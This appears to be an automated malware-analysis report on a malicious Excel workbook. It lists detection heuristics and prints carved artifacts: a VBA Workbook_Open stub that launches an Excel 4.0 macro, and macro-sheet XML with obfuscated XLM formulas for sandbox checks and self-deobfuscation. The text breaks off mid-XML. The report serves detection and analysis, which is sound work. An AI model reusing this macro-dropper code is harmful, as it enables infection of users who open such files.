MALICIOUS
158
Risk Score
Heuristics 6
-
Excel 4.0 macro sheet (1 sheet(s)) critical 1 related finding OOXML_XLM_MACROSHEETSpreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
-
Dangerous XLM formula APIs: FORMULA critical OOXML_XLM_DANGEROUS_FNExcel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
-
VBA project inside OOXML medium 1 related finding OOXML_VBADocument contains a VBA project — VBA macros present
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Private Sub Workbook_Open() -
Hidden worksheet (hidden) low OOXML_HIDDEN_SHEETExcel workbook contains 1 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/spreadsheetml/2006/main In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2014/revisionIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2015/revision2In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2016/revision3In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2016/revision6In document text (OOXML body / shared strings)
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 712 bytes |
SHA-256: 0acf22068aac0b197d8860c7d2bbf6d193ba3c6e33196bc3c92089d5cd86dfcd |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private Sub Workbook_Open()
ExecuteExcel4Macro ("SecureDocument1!WCGW()")
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 8704 bytes |
SHA-256: 9035c8bfd86bc8270fd7d144b80f815bf0f69412e777b3e95812fc865babb6cd |
|||
xlm_sheet_00.xml |
xlm-macrosheet | OOXML XLM macro sheet: xl/macrosheets/sheet1.xml | 32612 bytes |
SHA-256: bd1b2091cfefa62f63d917d2ef50ac0f3942cd4f4ed2b2b767a1fb6c30901602 |
|||
Preview scriptFirst 1,000 lines of the extracted script
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac xr xr2 xr3 xr6" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2" xmlns:xr3="http://schemas.microsoft.com/office/spreadsheetml/2016/revision3" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xr6:uid="{EE893509-E7EC-4ABC-AC04-97D1A1A279FF}"><dimension ref="A1:CT106"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"><selection activeCell="A52" sqref="A1:XFD1048576"/></sheetView></sheetViews><sheetFormatPr defaultColWidth="9.42578125" defaultRowHeight="15" x14ac:dyDescent="0.25"/><cols><col min="1" max="1" width="7.28515625" style="2" customWidth="1"/><col min="2" max="90" width="9.42578125" style="2"/><col min="91" max="91" width="51.85546875" style="2" bestFit="1" customWidth="1"/><col min="92" max="256" width="9.42578125" style="2"/><col min="257" max="257" width="7.28515625" style="2" customWidth="1"/><col min="258" max="512" width="9.42578125" style="2"/><col min="513" max="513" width="7.28515625" style="2" customWidth="1"/><col min="514" max="768" width="9.42578125" style="2"/><col min="769" max="769" width="7.28515625" style="2" customWidth="1"/><col min="770" max="1024" width="9.42578125" style="2"/><col min="1025" max="1025" width="7.28515625" style="2" customWidth="1"/><col min="1026" max="1280" width="9.42578125" style="2"/><col min="1281" max="1281" width="7.28515625" style="2" customWidth="1"/><col min="1282" max="1536" width="9.42578125" style="2"/><col min="1537" max="1537" width="7.28515625" style="2" customWidth="1"/><col min="1538" max="1792" width="9.42578125" style="2"/><col min="1793" max="1793" width="7.28515625" style="2" customWidth="1"/><col min="1794" max="2048" width="9.42578125" style="2"/><col min="2049" max="2049" width="7.28515625" style="2" customWidth="1"/><col min="2050" max="2304" width="9.42578125" style="2"/><col min="2305" max="2305" width="7.28515625" style="2" customWidth="1"/><col min="2306" max="2560" width="9.42578125" style="2"/><col min="2561" max="2561" width="7.28515625" style="2" customWidth="1"/><col min="2562" max="2816" width="9.42578125" style="2"/><col min="2817" max="2817" width="7.28515625" style="2" customWidth="1"/><col min="2818" max="3072" width="9.42578125" style="2"/><col min="3073" max="3073" width="7.28515625" style="2" customWidth="1"/><col min="3074" max="3328" width="9.42578125" style="2"/><col min="3329" max="3329" width="7.28515625" style="2" customWidth="1"/><col min="3330" max="3584" width="9.42578125" style="2"/><col min="3585" max="3585" width="7.28515625" style="2" customWidth="1"/><col min="3586" max="3840" width="9.42578125" style="2"/><col min="3841" max="3841" width="7.28515625" style="2" customWidth="1"/><col min="3842" max="4096" width="9.42578125" style="2"/><col min="4097" max="4097" width="7.28515625" style="2" customWidth="1"/><col min="4098" max="4352" width="9.42578125" style="2"/><col min="4353" max="4353" width="7.28515625" style="2" customWidth="1"/><col min="4354" max="4608" width="9.42578125" style="2"/><col min="4609" max="4609" width="7.28515625" style="2" customWidth="1"/><col min="4610" max="4864" width="9.42578125" style="2"/><col min="4865" max="4865" width="7.28515625" style="2" customWidth="1"/><col min="4866" max="5120" width="9.42578125" style="2"/><col min="5121" max="5121" width="7.28515625" style="2" customWidth="1"/><col min="5122" max="5376" width="9.42578125" style="2"/><col min="5377" max="5377" width="7.28515625" style="2" customWidth="1"/><col min="5378" max="5632" width="9.42578125" style="2"/><col min="5633" max="5633" width="7.28515625" style="2" customWidth="1"/><col min="5634" max="5888" width="9.42578125" style="2"/><col min="5889" max="5889" width="7.28515625" style="2" customWidth="1"/><col min="5890" max="6144" width="9.42578125" style="2"/><col min="6145" max="6145" width="7.28515625" style="2" customWidth="1"/><col min="6146" max="6400" width="9.42578125" style="2"/><col min="6401" max="6401" width="7.28515625" style="2" customWidth="1"/><col min="6402" max="6656" width="9.42578125" style="2"/><col min="6657" max="6657" width="7.28515625" style="2" customWidth="1"/><col min="6658" max="6912" width="9.42578125" style="2"/><col min="6913" max="6913" width="7.28515625" style="2" customWidth="1"/><col min="6914" max="7168" width="9.42578125" style="2"/><col min="7169" max="7169" width="7.28515625" style="2" customWidth="1"/><col min="7170" max="7424" width="9.42578125" style="2"/><col min="7425" max="7425" width="7.28515625" style="2" customWidth="1"/><col min="7426" max="7680" width="9.42578125" style="2"/><col min="7681" max="7681" width="7.28515625" style="2" customWidth="1"/><col min="7682" max="7936" width="9.42578125" style="2"/><col min="7937" max="7937" width="7.28515625" style="2" customWidth="1"/><col min="7938" max="8192" width="9.42578125" style="2"/><col min="8193" max="8193" width="7.28515625" style="2" customWidth="1"/><col min="8194" max="8448" width="9.42578125" style="2"/><col min="8449" max="8449" width="7.28515625" style="2" customWidth="1"/><col min="8450" max="8704" width="9.42578125" style="2"/><col min="8705" max="8705" width="7.28515625" style="2" customWidth="1"/><col min="8706" max="8960" width="9.42578125" style="2"/><col min="8961" max="8961" width="7.28515625" style="2" customWidth="1"/><col min="8962" max="9216" width="9.42578125" style="2"/><col min="9217" max="9217" width="7.28515625" style="2" customWidth="1"/><col min="9218" max="9472" width="9.42578125" style="2"/><col min="9473" max="9473" width="7.28515625" style="2" customWidth="1"/><col min="9474" max="9728" width="9.42578125" style="2"/><col min="9729" max="9729" width="7.28515625" style="2" customWidth="1"/><col min="9730" max="9984" width="9.42578125" style="2"/><col min="9985" max="9985" width="7.28515625" style="2" customWidth="1"/><col min="9986" max="10240" width="9.42578125" style="2"/><col min="10241" max="10241" width="7.28515625" style="2" customWidth="1"/><col min="10242" max="10496" width="9.42578125" style="2"/><col min="10497" max="10497" width="7.28515625" style="2" customWidth="1"/><col min="10498" max="10752" width="9.42578125" style="2"/><col min="10753" max="10753" width="7.28515625" style="2" customWidth="1"/><col min="10754" max="11008" width="9.42578125" style="2"/><col min="11009" max="11009" width="7.28515625" style="2" customWidth="1"/><col min="11010" max="11264" width="9.42578125" style="2"/><col min="11265" max="11265" width="7.28515625" style="2" customWidth="1"/><col min="11266" max="11520" width="9.42578125" style="2"/><col min="11521" max="11521" width="7.28515625" style="2" customWidth="1"/><col min="11522" max="11776" width="9.42578125" style="2"/><col min="11777" max="11777" width="7.28515625" style="2" customWidth="1"/><col min="11778" max="12032" width="9.42578125" style="2"/><col min="12033" max="12033" width="7.28515625" style="2" customWidth="1"/><col min="12034" max="12288" width="9.42578125" style="2"/><col min="12289" max="12289" width="7.28515625" style="2" customWidth="1"/><col min="12290" max="12544" width="9.42578125" style="2"/><col min="12545" max="12545" width="7.28515625" style="2" customWidth="1"/><col min="12546" max="12800" width="9.42578125" style="2"/><col min="12801" max="12801" width="7.28515625" style="2" customWidth="1"/><col min="12802" max="13056" width="9.42578125" style="2"/><col min="13057" max="13057" width="7.28515625" style="2" customWidth="1"/><col min="13058" max="13312" width="9.42578125" style="2"/><col min="13313" max="13313" width="7.28515625" style="2" customWidth="1"/><col min="13314" max="13568" width="9.42578125" style="2"/><col min="13569" max="13569" width="7.28515625" style="2" customWidth="1"/><col min="13570" max="13824" width="9.42578125" style="2"/><col min="13825" max="13825" width="7.28515625" style="2" customWidth="1"/><col min="13826" max="14080" width="9.42578125" style="2"/><col min="14081" max="14081" width="7.28515625" style="2" customWidth="1"/><col min="14082" max="14336" width="9.42578125" style="2"/><col min="14337" max="14337" width="7.28515625" style="2" customWidth="1"/><col min="14338" max="14592" width="9.42578125" style="2"/><col min="14593" max="14593" width="7.28515625" style="2" customWidth="1"/><col min="14594" max="14848" width="9.42578125" style="2"/><col min="14849" max="14849" width="7.28515625" style="2" customWidth="1"/><col min="14850" max="15104" width="9.42578125" style="2"/><col min="15105" max="15105" width="7.28515625" style="2" customWidth="1"/><col min="15106" max="15360" width="9.42578125" style="2"/><col min="15361" max="15361" width="7.28515625" style="2" customWidth="1"/><col min="15362" max="15616" width="9.42578125" style="2"/><col min="15617" max="15617" width="7.28515625" style="2" customWidth="1"/><col min="15618" max="15872" width="9.42578125" style="2"/><col min="15873" max="15873" width="7.28515625" style="2" customWidth="1"/><col min="15874" max="16128" width="9.42578125" style="2"/><col min="16129" max="16129" width="7.28515625" style="2" customWidth="1"/><col min="16130" max="16384" width="9.42578125" style="2"/></cols><sheetData><row r="1" spans="1:98" x14ac:dyDescent="0.25"><c r="A1" s="2" t="b"><f>DEFINE.NAME("x",26)</f><v>1</v></c><c r="CM1" s="2" t="b"><f>IF(SEARCH("Windows",EVALUATE(CQ11&CP13&CQ12&CP11&CT1&CP12)),GOTO(CM2),FILE.CLOSE(FALSE))</f><v>1</v></c><c r="CT1" s="2"><v>1</v></c></row><row r="2" spans="1:98" x14ac:dyDescent="0.25"><c r="A2" s="2" t="b"><f>WHILE(x<200)</f><v>1</v></c><c r="CM2" s="2" t="b"><f>IF(EVALUATE(CQ11&CP13&CQ12&CP11&CT2&CP12),FILE.CLOSE(FALSE),GOTO(CM3))</f><v>0</v></c><c r="CT2" s="2"><v>31</v></c></row><row r="3" spans="1:98" x14ac:dyDescent="0.25"><c r="A3" s="2" t="b"><f>DEFINE.NAME("y",45)</f><v>1</v></c><c r="CM3" s="2" t="b"><f>IF(EVALUATE(CQ11&CP13&CQ13&CP11&CT3&CP12),FILE.CLOSE(FALSE),GOTO(CM4))</f><v>1</v></c><c r="CT3" s="2"><v>4</v></c></row><row r="4" spans="1:98" x14ac:dyDescent="0.25"><c r="A4" s="2" t="b"><f>DEFINE.NAME("x",x+1)</f><v>1</v></c><c r="B4" s="2" t="s"><v>41</v></c><c r="CM4" s="2" t="b"><f>IF(EVALUATE(CQ11&CP13&CQ12&CP11&CT4&CP12),GOTO(CM5),FILE.CLOSE(FALSE))</f><v>1</v></c><c r="CT4" s="2"><v>19</v></c></row><row r="5" spans="1:98" x14ac:dyDescent="0.25"><c r="A5" s="2" t="b"><f>WHILE(y < 300)</f><v>1</v></c><c r="B5" s="2" t="s"><v>41</v></c><c r="C5" s="2" t="s"><v>41</v></c><c r="CM5" s="2" t="b"><f>IF(SEARCH("C:\Program Files",EVALUATE(CQ11&CP13&CQ12&CP11&CT5&CP12)),GOTO(CM6),FILE.CLOSE(FALSE))</f><v>1</v></c><c r="CT5" s="2"><v>48</v></c></row><row r="6" spans="1:98" x14ac:dyDescent="0.25"><c r="A6" s="2" t="b"><f>DEFINE.NAME("y",y+1)</f><v>1</v></c><c r="B6" s="2" t="s"><v>41</v></c><c r="C6" s="2" t="s"><v>41</v></c><c r="CM6" s="2" t="b"><f>IF(SEARCH("C:\Users",EVALUATE(CQ11&CP13&CQ12&CP11&CT6&CP12)),GOTO(CM7),FILE.CLOSE(FALSE))</f><v>1</v></c><c r="CT6" s="2"><v>67</v></c></row><row r="7" spans="1:98" x14ac:dyDescent="0.25"><c r="A7" s="2" t="b"><f>INDIRECT(ADDRESS(y,x))="~"</f><v>0</v></c><c r="B7" s="2" t="s"><v>41</v></c><c r="C7" s="2" t="s"><v>41</v></c><c r="CM7" s="2" t="b"><f>IF(EVALUATE(CQ11&CP13&CQ17&CP11&CT7&CP12),GOTO(Stuffy),FILE.CLOSE(FALSE))</f><v>0</v></c><c r="CT7" s="2"><v>20</v></c></row><row r="8" spans="1:98" x14ac:dyDescent="0.25"><c r="A8" s="2" t="b"><f>INDIRECT(ADDRESS(y,x))="#"</f><v>0</v></c><c r="B8" s="2" t="s"><v>41</v></c><c r="C8" s="2" t="s"><v>41</v></c></row><row r="9" spans="1:98" x14ac:dyDescent="0.25"><c r="A9" s="2" t="str"><f>INDIRECT(ADDRESS(y,x))</f><v>#</v></c><c r="B9" s="2" t="s"><v>41</v></c><c r="C9" s="2" t="s"><v>41</v></c></row><row r="10" spans="1:98" x14ac:dyDescent="0.25"><c r="A10" s="2" t="b"><f>IF(OR(A7,A8),DEFINE.NAME("y",1000),SET.VALUE(B30,A9))</f><v>1</v></c><c r="B10" s="2" t="s"><v>41</v></c><c r="C10" s="2" t="s"><v>41</v></c></row><row r="11" spans="1:98" x14ac:dyDescent="0.25"><c r="A11" s="2" t="b"><f>IF(A8,DEFINE.NAME("x",2000))</f><v>1</v></c><c r="B11" s="2" t="s"><v>41</v></c><c r="C11" s="2" t="s"><v>41</v></c><c r="CP11" s="2" t="s"><v>38</v></c><c r="CQ11" s="2" t="s"><v>76</v></c></row><row r="12" spans="1:98" x14ac:dyDescent="0.25"><c r="A12" s="2" t="b"><f>IF(OR(A8,A7),DEFINE.NAME("z",2000),DEFINE.NAME("z",79))</f><v>1</v></c><c r="B12" s="2" t="s"><v>41</v></c><c r="C12" s="2" t="s"><v>41</v></c><c r="CB12" s="2" t="s"><v>34</v></c><c r="CC12" s="2" t="s"><v>42</v></c><c r="CD12" s="2" t="s"><v>33</v></c><c r="CP12" s="2" t="s"><v>77</v></c><c r="CQ12" s="2" t="s"><v>78</v></c></row><row r="13" spans="1:98" x14ac:dyDescent="0.25"><c r="A13" s="2" t="b"><f>IF(OR(A7,A8),DEFINE.NAME("p",2000),DEFINE.NAME("p",11))</f><v>1</v></c><c r="B13" s="2" t="s"><v>41</v></c><c r="C13" s="2" t="s"><v>41</v></c><c r="CB13" s="2" t="s"><v>42</v></c><c r="CC13" s="2" t="s"><v>35</v></c><c r="CP13" s="2" t="s"><v>79</v></c><c r="CQ13" s="2" t="s"><v>80</v></c></row><row r="14" spans="1:98" x14ac:dyDescent="0.25"><c r="A14" s="2" t="b"><f>IF(A8,DEFINE.NAME("y",2000))</f><v>1</v></c><c r="B14" s="2" t="s"><v>41</v></c><c r="C14" s="2" t="s"><v>41</v></c><c r="CB14" s="2" t="s"><v>36</v></c><c r="CC14" s="2" t="s"><v>43</v></c></row><row r="15" spans="1:98" x14ac:dyDescent="0.25"><c r="A15" s="2" t="b"><f>WHILE(z < 100)</f><v>1</v></c><c r="B15" s="2" t="s"><v>41</v></c><c r="C15" s="2" t="s"><v>41</v></c><c r="CB15" s="2" t="s"><v>39</v></c><c r="CC15" s="2"><v>2</v></c></row><row r="16" spans="1:98" x14ac:dyDescent="0.25"><c r="A16" s="2" t="b"><f>DEFINE.NAME("z",z+1)</f><v>1</v></c><c r="B16" s="2" t="s"><v>41</v></c><c r="C16" s="2" t="s"><v>41</v></c><c r="CB16" s="2" t="s"><v>38</v></c><c r="CC16" s="2" t="s"><v>37</v></c></row><row r="17" spans="1:95" x14ac:dyDescent="0.25"><c r="A17" s="2" t="b"><f>DEFINE.NAME("p",11)</f><v>1</v></c><c r="B17" s="2" t="s"><v>41</v></c><c r="C17" s="2" t="s"><v>41</v></c><c r="CB17" s="2" t="s"><v>40</v></c><c r="CC17" s="2" t="s"><v>35</v></c><c r="CQ17" s="2" t="s"><v>81</v></c></row><row r="18" spans="1:95" x14ac:dyDescent="0.25"><c r="A18" s="2" t="b"><f>WHILE(p <500)</f><v>1</v></c><c r="B18" s="2" t="s"><v>41</v></c><c r="C18" s="2" t="s"><v>41</v></c><c r="CC18" s="2" t="s"><v>34</v></c></row><row r="19" spans="1:95" x14ac:dyDescent="0.25"><c r="A19" s="2" t="b"><f>DEFINE.NAME("p",p+1)</f><v>1</v></c><c r="B19" s="2" t="s"><v>41</v></c><c r="C19" s="2" t="s"><v>41</v></c><c r="CC19" s="2" t="s"><v>38</v></c></row><row r="20" spans="1:95" x14ac:dyDescent="0.25"><c r="A20" s="2" t="b"><f>INDIRECT(ADDRESS(p,z))="~"</f><v>0</v></c><c r="B20" s="2" t="s"><v>41</v></c><c r="C20" s="2" t="s"><v>41</v></c><c r="CC20" s="2" t="s"><v>40</v></c></row><row r="21" spans="1:95" x14ac:dyDescent="0.25"><c r="A21" s="2" t="str"><f>D36&INDIRECT(ADDRESS(p,z))</f><v>TRUE</v></c><c r="B21" s="2" t="s"><v>41</v></c><c r="C21" s="2" t="s"><v>41</v></c></row><row r="22" spans="1:95" x14ac:dyDescent="0.25"><c r="A22" s="2" t="b"><f>INDIRECT(ADDRESS(p,z))="#"</f><v>1</v></c><c r="B22" s="2" t="s"><v>41</v></c><c r="C22" s="2" t="s"><v>41</v></c></row><row r="23" spans="1:95" x14ac:dyDescent="0.25"><c r="A23" s="2" t="b"><f>IF(OR(A22),DEFINE.NAME("z",1000))</f><v>1</v></c><c r="B23" s="2" t="s"><v>41</v></c><c r="C23" s="2" t="s"><v>41</v></c></row><row r="24" spans="1:95" x14ac:dyDescent="0.25"><c r="A24" s="2" t="b"><f>IF(OR(A22),DEFINE.NAME("p",1000))</f><v>1</v></c><c r="B24" s="2" t="s"><v>41</v></c><c r="C24" s="2" t="s"><v>41</v></c></row><row r="25" spans="1:95" x14ac:dyDescent="0.25"><c r="A25" s="2" t="b"><f>IF(OR(A20,A22),DEFINE.NAME("p",1000),SET.VALUE(D36,A21))</f><v>1</v></c><c r="B25" s="2" t="s"><v>41</v></c><c r="C25" s="2" t="s"><v>41</v></c></row><row r="26" spans="1:95" x14ac:dyDescent="0.25"><c r="A26" s="2" t="b"><f>NEXT()</f><v>1</v></c><c r="B26" s="2" t="s"><v>41</v></c><c r="C26" s="2" t="s"><v>41</v></c></row><row r="27" spans="1:95" x14ac:dyDescent="0.25"><c r="A27" s="2" t="b"><f>NEXT()</f><v>1</v></c><c r="B27" s="2" t="s"><v>41</v></c><c r="C27" s="2" t="s"><v>41</v></c></row><row r="28" spans="1:95" x14ac:dyDescent="0.25"><c r="A28" s="2" t="b"><f>IF(OR(A8,A7),GOTO(A2),SET.VALUE(B36,D36&""""&B30&"""))"))</f><v>1</v></c><c r="B28" s="2" t="s"><v>41</v></c><c r="C28" s="2" t="s"><v>41</v></c></row><row r="29" spans="1:95" x14ac:dyDescent="0.25"><c r="A29" s="2" t="b"><f>DEFINE.NAME("v",2)</f><v>1</v></c><c r="B29" s="2" t="s"><v>41</v></c><c r="C29" s="2" t="s"><v>41</v></c></row><row r="30" spans="1:95" x14ac:dyDescent="0.25"><c r="A30" s="2" t="b"><f>DEFINE.NAME("n",40)</f><v>1</v></c><c r="B30" s="2" t="s"><v>41</v></c><c r="C30" s="2" t="s"><v>41</v></c></row><row r="31" spans="1:95" x14ac:dyDescent="0.25"><c r="A31" s="2" t="b"><f>DEFINE.NAME("e",40)</f><v>1</v></c><c r="B31" s="2" t="s"><v>41</v></c><c r="C31" s="2" t="s"><v>41</v></c></row><row r="32" spans="1:95" x14ac:dyDescent="0.25"><c r="A32" s="2" t="b"><f>WHILE(LEN(INDIRECT(ADDRESS(n,v))) > 100)</f><v>1</v></c><c r="B32" s="2" t="s"><v>41</v></c><c r="C32" s="2" t="s"><v>41</v></c></row><row r="33" spans="1:30" x14ac:dyDescent="0.25"><c r="A33" s="2" t="b"><f>DEFINE.NAME("n",n+1)</f><v>1</v></c><c r="B33" s="2" t="s"><v>41</v></c><c r="C33" s="2" t="s"><v>41</v></c></row><row r="34" spans="1:30" x14ac:dyDescent="0.25"><c r="A34" s="2" t="b"><f>NEXT()</f><v>1</v></c><c r="B34" s="2" t="s"><v>41</v></c><c r="C34" s="2" t="s"><v>41</v></c></row><row r="35" spans="1:30" x14ac:dyDescent="0.25"><c r="A35" s="2" t="b"><f>WHILE(LEN(INDIRECT(ADDRESS(n,v))) = 0)</f><v>1</v></c><c r="B35" s="2" t="s"><v>41</v></c><c r="C35" s="2" t="s"><v>41</v></c></row><row r="36" spans="1:30" x14ac:dyDescent="0.25"><c r="A36" s="2" t="b"><f>SET.VALUE(INDIRECT(ADDRESS(n,v)),"=")</f><v>1</v></c><c r="B36" s="2" t="s"><v>41</v></c><c r="C36" s="2" t="s"><v>41</v></c><c r="D36" s="2" t="s"><v>41</v></c></row><row r="37" spans="1:30" x14ac:dyDescent="0.25"><c r="A37" s="2" t="b"><f>NEXT()</f><v>1</v></c><c r="B37" s="2" t="s"><v>41</v></c><c r="C37" s="2" t="s"><v>41</v></c></row><row r="38" spans="1:30" x14ac:dyDescent="0.25"><c r="A38" s="2" t="str"><f>IF(x < 200,INDIRECT(ADDRESS(n,v))&INDIRECT(ADDRESS(36,2)))</f><v/></c><c r="B38" s="2" t="s"><v>41</v></c><c r="C38" s="2" t="s"><v>41</v></c></row><row r="39" spans="1:30" x14ac:dyDescent="0.25"><c r="A39" s="2" t="b"><f>SET.VALUE(INDIRECT(ADDRESS(n,v)),A38)</f><v>1</v></c><c r="B39" s="2" t="s"><v>41</v></c><c r="C39" s="2" t="s"><v>41</v></c></row><row r="40" spans="1:30" x14ac:dyDescent="0.25"><c r="A40" s="2" t="b"><f>SET.VALUE(D36,"")</f><v>1</v></c><c r="B40" s="2" t="s"><v>41</v></c><c r="C40" s="2" t="s"><v>41</v></c></row><row r="41" spans="1:30" x14ac:dyDescent="0.25"><c r="A41" s="2" t="b"><f>SET.VALUE(B36,"")</f><v>1</v></c><c r="B41" s="2" t="s"><v>41</v></c><c r="C41" s="2" t="s"><v>41</v></c></row><row r="42" spans="1:30" x14ac:dyDescent="0.25"><c r="A42" s="2" t="b"><f>SET.VALUE(B30,"")</f><v>1</v></c><c r="B42" s="2" t="s"><v>41</v></c><c r="C42" s="2" t="s"><v>41</v></c></row><row r="43" spans="1:30" x14ac:dyDescent="0.25"><c r="A43" s="2" t="str"><f>INDIRECT(ADDRESS(n,v))&"&"</f><v>&</v></c><c r="B43" s="2" t="s"><v>41</v></c><c r="C43" s="2" t="s"><v>41</v></c></row><row r="44" spans="1:30" x14ac:dyDescent="0.25"><c r="A44" s="2" t="b"><f>SET.VALUE(INDIRECT(ADDRESS(n,v)),A43)</f><v>1</v></c><c r="B44" s="2" t="s"><v>41</v></c><c r="C44" s="2" t="s"><v>41</v></c></row><row r="45" spans="1:30" x14ac:dyDescent="0.25"><c r="A45" s="2" t="b"><f>NEXT()</f><v>1</v></c><c r="B45" s="2" t="s"><v>41</v></c><c r="C45" s="2" t="s"><v>41</v></c></row><row r="46" spans="1:30" x14ac:dyDescent="0.25"><c r="A46" s="2" t="b"><f>NEXT()</f><v>1</v></c><c r="B46" s="2" t="s"><v>41</v></c><c r="C46" s="2" t="s"><v>41</v></c><c r="AA46" s="2" t="s"><v>44</v></c><c r="AB46" s="2" t="s"><v>45</v></c><c r="AC46" s="2" t="s"><v>46</v></c><c r="AD46" s="2" t="s"><v>33</v></c></row><row r="47" spans="1:30" x14ac:dyDescent="0.25"><c r="B47" s="2" t="s"><v>41</v></c><c r="C47" s="2" t="s"><v>41</v></c><c r="AA47" s="2" t="s"><v>47</v></c><c r="AB47" s="2" t="s"><v>48</v></c><c r="AC47" s="2" t="s"><v>49</v></c></row><row r="48" spans="1:30" x14ac:dyDescent="0.25"><c r="A48" s="2" t="b"><f>DEFINE.NAME("e",40)</f><v>1</v></c><c r="B48" s="2" t="s"><v>41</v></c><c r="C48" s="2" t="s"><v>41</v></c><c r="AA48" s="2" t="s"><v>44</v></c><c r="AB48" s="2" t="s"><v>50</v></c><c r="AC48" s="2" t="s"><v>51</v></c></row><row r="49" spans="1:29" x14ac:dyDescent="0.25"><c r="A49" s="2" t="b"><f>WHILE(e<n+1)</f><v>1</v></c><c r="B49" s="2" t="s"><v>41</v></c><c r="C49" s="2" t="s"><v>41</v></c><c r="AA49" s="2" t="s"><v>52</v></c><c r="AB49" s="2" t="s"><v>46</v></c><c r="AC49" s="2" t="s"><v>53</v></c></row><row r="50" spans="1:29" x14ac:dyDescent="0.25"><c r="A50" s="2" t="b"><f>IF(RIGHT((INDIRECT(ADDRESS(e,v))),1) = "&",LEFT(INDIRECT(ADDRESS(e,v)),LEN(INDIRECT(ADDRESS(e,v)))-1))</f><v>0</v></c><c r="B50" s="2" t="s"><v>41</v></c><c r="C50" s="2" t="s"><v>41</v></c><c r="AA50" s="2" t="s"><v>54</v></c><c r="AB50" s="2"><v>20</v></c><c r="AC50" s="2" t="s"><v>55</v></c></row><row r="51" spans="1:29" x14ac:dyDescent="0.25"><c r="A51" s="2" t="b"><f>SET.VALUE(INDIRECT(ADDRESS(e,v)),A50)</f><v>1</v></c><c r="B51" s="2" t="s"><v>41</v></c><c r="C51" s="2" t="s"><v>41</v></c><c r="AA51" s="2" t="s"><v>56</v></c><c r="AB51" s="2" t="s"><v>40</v></c><c r="AC51" s="2" t="s"><v>57</v></c></row><row r="52" spans="1:29" x14ac:dyDescent="0.25"><c r="A52" s="2" t="b"><f>DEFINE.NAME("e",e+1)</f><v>1</v></c><c r="B52" s="2" t="s"><v>41</v></c><c r="C52" s="2" t="s"><v>41</v></c><c r="AA52" s="2" t="s"><v>58</v></c><c r="AC52" s="2" t="s"><v>44</v></c></row><row r="53" spans="1:29" x14ac:dyDescent="0.25"><c r="A53" s="2" t="b"><f>NEXT()</f><v>1</v></c><c r="B53" s="2" t="s"><v>41</v></c><c r="C53" s="2" t="s"><v>41</v></c><c r="AA53" s="2" t="s"><v>59</v></c><c r="AC53" s="2" t="s"><v>55</v></c></row><row r="54" spans="1:29" x14ac:dyDescent="0.25"><c r="A54" s="2" t="b"><f>DEFINE.NAME("e",40)</f><v>1</v></c><c r="B54" s="2" t="s"><v>41</v></c><c r="C54" s="2" t="s"><v>41</v></c><c r="AA54" s="2" t="s"><v>49</v></c><c r="AC54" s="2" t="s"><v>46</v></c></row><row r="55" spans="1:29" x14ac:dyDescent="0.25"><c r="A55" s="2" t="b"><f>WHILE(e<n+1)</f><v>1</v></c><c r="B55" s="2" t="s"><v>41</v></c><c r="C55" s="2" t="s"><v>41</v></c><c r="AA55" s="2" t="s"><v>48</v></c><c r="AC55" s="2" t="s"><v>60</v></c></row><row r="56" spans="1:29" x14ac:dyDescent="0.25"><c r="A56" s="2" t="e"><f>C40&EVALUATE(ABSREF("R["&e-60&"]C[1]",A60))</f><v>#VALUE!</v></c><c r="B56" s="2" t="s"><v>41</v></c><c r="C56" s="2" t="s"><v>41</v></c><c r="AA56" s="2" t="s"><v>61</v></c><c r="AC56" s="2" t="s"><v>51</v></c></row><row r="57" spans="1:29" x14ac:dyDescent="0.25"><c r="A57" s="2" t="b"><f>SET.VALUE(C40,A56)</f><v>1</v></c><c r="B57" s="2" t="s"><v>41</v></c><c r="C57" s="2" t="s"><v>41</v></c><c r="AA57" 